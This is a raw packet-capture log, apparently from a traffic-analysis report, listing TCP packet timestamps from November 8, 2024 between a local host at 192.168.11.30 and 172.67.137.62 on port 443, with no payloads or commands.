                                                                                                                          Nov 8, 2024 10:58:41.078309059 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.078588009 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.078588963 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.078594923 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.078967094 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.079065084 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.079262018 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.079541922 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.079543114 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.079549074 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.079926014 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.079983950 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.080137014 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.080389023 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.080389023 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.080395937 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.080766916 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.081049919 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.081248045 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.081341028 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.081347942 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.081528902 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.081721067 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.085679054 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.085880041 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.085973978 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.086222887 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.086226940 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.128391027 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.322873116 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.322926998 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.322976112 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.323256969 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.323263884 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.323442936 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.323535919 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.323548079 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.323635101 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.323641062 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.323826075 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.323828936 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.323874950 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.323924065 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.324116945 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.324116945 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.324165106 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.324399948 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.324923038 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.325072050 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.325345993 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.325345993 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.325351954 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.325525045 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.325716972 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.327095032 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.327111006 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.327243090 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.327517033 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.327517033 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.327523947 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.327697992 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.327697992 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.327697992 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.327877045 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.332916021 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.338440895 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.562514067 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.562530994 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.562932968 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.562932968 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.562946081 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.563111067 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.563291073 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.563380957 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.563657045 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.563657045 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.563904047 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.563909054 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.565341949 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.565356016 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.565802097 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.565809011 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.565994024 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.567188025 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.567200899 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.567599058 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.567599058 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.567599058 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.567606926 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.567790031 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.567981958 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.569399118 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.569412947 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.569663048 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.569663048 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.569669008 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.569854975 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.570045948 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.571403027 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.571417093 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.571851015 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.571851015 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.571860075 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.572031021 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.573133945 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.573462009 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.573476076 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.573611975 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.573703051 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.573883057 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.574063063 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.574068069 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.574496031 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.593702078 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.803708076 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.803957939 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.805624962 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.805634975 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.805855036 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.805866003 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.805969954 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.806325912 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.806711912 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.806899071 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.807214975 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.807224989 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.808684111 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.808697939 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.808949947 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.808959007 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.809134007 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.809326887 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.810611963 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.810623884 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.810834885 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.811059952 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.811067104 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.811117887 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.823048115 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.823064089 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.823273897 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.823285103 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.823301077 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.823545933 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.823545933 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.823553085 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.823791027 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.823791027 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.823801994 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:41.823859930 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.824237108 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.824237108 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.824440002 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.824605942 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.833595991 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:41.844799995 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.052892923 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.052905083 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.053373098 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.053553104 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.053561926 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.053874016 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.064690113 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.064699888 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.064796925 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.064923048 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.065093040 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.065093040 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.065105915 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.065257072 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.065448046 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.065454006 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.065640926 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.065643072 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.065831900 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.065881014 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.065884113 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.066066980 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.066257954 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.066308022 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.066767931 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.066780090 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.067064047 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.067244053 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.067250013 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.067461014 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.069021940 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.069037914 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.069727898 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.069736958 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.069991112 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.070135117 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.070230007 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.070234060 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.070422888 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.070642948 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.070642948 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.078067064 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.289688110 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.289788961 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.289880037 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.290059090 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.290065050 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.292274952 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.292285919 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.292695045 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.292705059 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.292887926 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.292887926 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.294547081 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.294569016 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.294678926 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.294804096 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.294812918 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.294995070 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.294995070 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.295186996 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.295186996 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.298242092 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.298397064 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.298556089 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.298736095 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.298736095 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.298741102 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.299053907 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.306303978 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.306437016 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.306471109 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.306566954 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.306742907 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.306742907 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.306756020 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.306763887 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.306922913 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.306922913 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.306934118 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.306945086 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.307113886 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.307113886 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.307121992 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.307306051 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.307306051 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.307497978 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.307504892 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.307689905 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.307698965 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.307857990 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.307857990 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.308243036 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.308243036 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.308248997 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.308290958 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.308674097 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.310199022 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.310213089 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.310442924 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.310626030 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.310626030 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.310631990 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.310801983 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.312206984 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.312222958 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.312331915 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.312499046 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.312506914 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.312690973 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.312690973 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.312881947 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.381946087 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.392215014 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.533665895 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.533689022 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.534116030 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.534116030 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.534137964 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.534295082 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.534486055 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.535624981 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.535638094 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.536051989 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.536051989 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.536051989 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.536062002 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.536230087 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.536408901 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.537516117 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.537533045 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.537966967 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.537966967 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.537972927 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.538146973 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.538338900 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.539442062 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.539455891 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.539680958 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.539861917 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.539866924 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.540041924 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.540090084 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.542129993 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.542145014 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.542579889 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.542579889 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.542588949 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.542948961 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.549932003 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.549952030 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.550117016 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.550353050 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.550364017 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.550364017 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.550364017 CET49747443192.168.11.30172.67.137.62
